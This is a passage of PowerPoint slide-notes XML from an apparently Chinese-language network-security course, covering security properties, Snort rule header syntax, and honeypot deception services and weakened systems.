                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Confidentiality）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>指只有合法的授权用户才能对机密的或受限的数据进行存取。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可用性（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Availability）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>是指</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>计算机资源在系统合法用户需要使用时必须是可用的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可控性（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Controliability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>是指可以控制授权范围内的信息流向及行为方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3743480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2D960D42-A782-45E8-98EC-78F4D9E8D0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DB6FF7A-DE3C-4E0D-B47B-4F1D095BF170}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227331" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D064CF54-904E-4616-A56A-D702C126BA6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227332" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11BD799E-D8B7-4872-B251-0E394DEC49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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>协议（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>每条规则的第二项就是协议项。当前，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>能够分析的协议是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>TCP、UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ICMP。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>将来，可能提供对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ARP、ICRP、GRE、OSPF、RIP、IPX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>等协议的支持。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>规则头下面的部分就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址和端口信息。关键词</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可以用来定义任意的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>不支持对主机名的解析，所以地址只能使用数字/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CIDR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的形式，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CIDR（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>无级别域内路由）指明应用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址的掩码。/24表示一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>类网络；/16表示一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>类网络；而/32表示一台特定的主机地址。在规则中，可以使用否定操作符(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>negation operator)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址进行操作。它告诉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>snort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>除了列出的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址外，匹配所有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址。否定操作符使用!表示。例如，使用否定操作符可以很轻松地对上面的规则进行改写，使其对从外部网络向内的数据报警。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1264889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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DECFC9-34A1-4099-AACA-DB6F66E3735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2EAD0815-ACD5-4A87-A3EE-69A46FDEEAEC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184323" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C69D6DFD-FBFC-4C62-BB1C-B9CE6546002B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184324" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B4937C-D657-4CF0-98F2-5094E343DD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000" b="1"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>诱骗服务（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1"/>
              <a:t>deception </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1" u="sng"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>） 诱骗服务是指在特定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>服务端口帧听并像应用服务程序那样对各种网络请求进行应答的应用程序。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000"/>
              <a:t>DTK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>就是这样的一个服务性产品。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000"/>
              <a:t>DTK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>吸引攻击者的诡计就是可执行性，但是它与攻击者进行交互的方式是模仿那些具有可攻击弱点的系统进行的，所以可以产生的应答非常有限。在这个过程中对所有的行为进行记录，同时提供较为合理的应答，并给闯入系统的攻击者带来系统并不安全的错觉。例如，当我们将诱骗服务配置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>服务的模式。当攻击者连接到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000"/>
              <a:t>TCP/21</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>端口的时候，就会收到一个由蜜罐发出的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>的标识。如果攻击者认为诱骗服务就是他要攻击的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>，他就会采用攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>服务的方式进入系统。这样，系统管理员便可以记录攻击的细节。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>例如，可以将诱骗服务配置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1"/>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>服务的模式，当攻击者连接到蜜罐的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1"/>
              <a:t>TCP/25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>端口时，就会收到一个由蜜罐发出的代表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1"/>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>版本号的标识。如果攻击者认为诱骗服务就是他要攻击的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1"/>
              <a:t>Sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>服务器，攻击者就会采用攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1"/>
              <a:t>Sendmai1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>服务器的方式进入系统。此时，蜜罐系统便可记录到详细的攻击行为，系统管理员可以采取相应的措施保护网络中实际运行着的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1"/>
              <a:t>Sendmaii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>系统。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>蜜罐的诱骗服务需要精心设计和配置，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>首先，要将服务模拟得足以让攻击者相信就是一件非常困难的事情。例如，攻击者可能用各种不同的电子邮件地址来检验预期的响应，还可能用一系列控制命令进行检查。如果诱骗服务有能力通过这些来自攻击者的预先检测，攻击者才有可能进入蜜罐设定的陷阱并进行攻击行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>另一个问题是诱骗服务只能收集有限的信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" b="1"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="1"/>
              <a:t>从理论上讲，诱骗服务本身可以在一定程度上允许攻击者访问系统，这样会带来一定的风险，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000"/>
              <a:t>如果系统记录所有蜜罐本身的日志信息，而攻击者找到了攻击诱骗服务的方法，蜜罐就陷入了失控状态，攻击者可以闯入系统将所有攻击的证据删除。甚至蜜罐还有可能成为攻击者攻击其他系统的工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="10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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A283DCF-B28A-480B-BFE8-DF2F9AC116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3BA157F-6FBF-4394-B220-FCE3CB89A632}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>165</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186371" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE83A54F-EF51-4A89-A1AF-BF3776958292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186372" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{819A015B-BF8F-4DC0-9D88-D02FF9AFDB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(2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>弱化系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>弱化系统是一个配置有已知攻击弱点的操作系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，如只要在外部因特网上有一台计算机运行没有打上补丁的微软</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Red Hat Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>即可。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>这样使攻击者更加容易进入系统，系统可以收集有效的攻击数据。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为了保证攻击者不能删除蜜罐的日志信息，需要运行其他额外的记录系统，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>syslogd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或入侵检测系统等，实现对日志记录的异地存储和备份。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
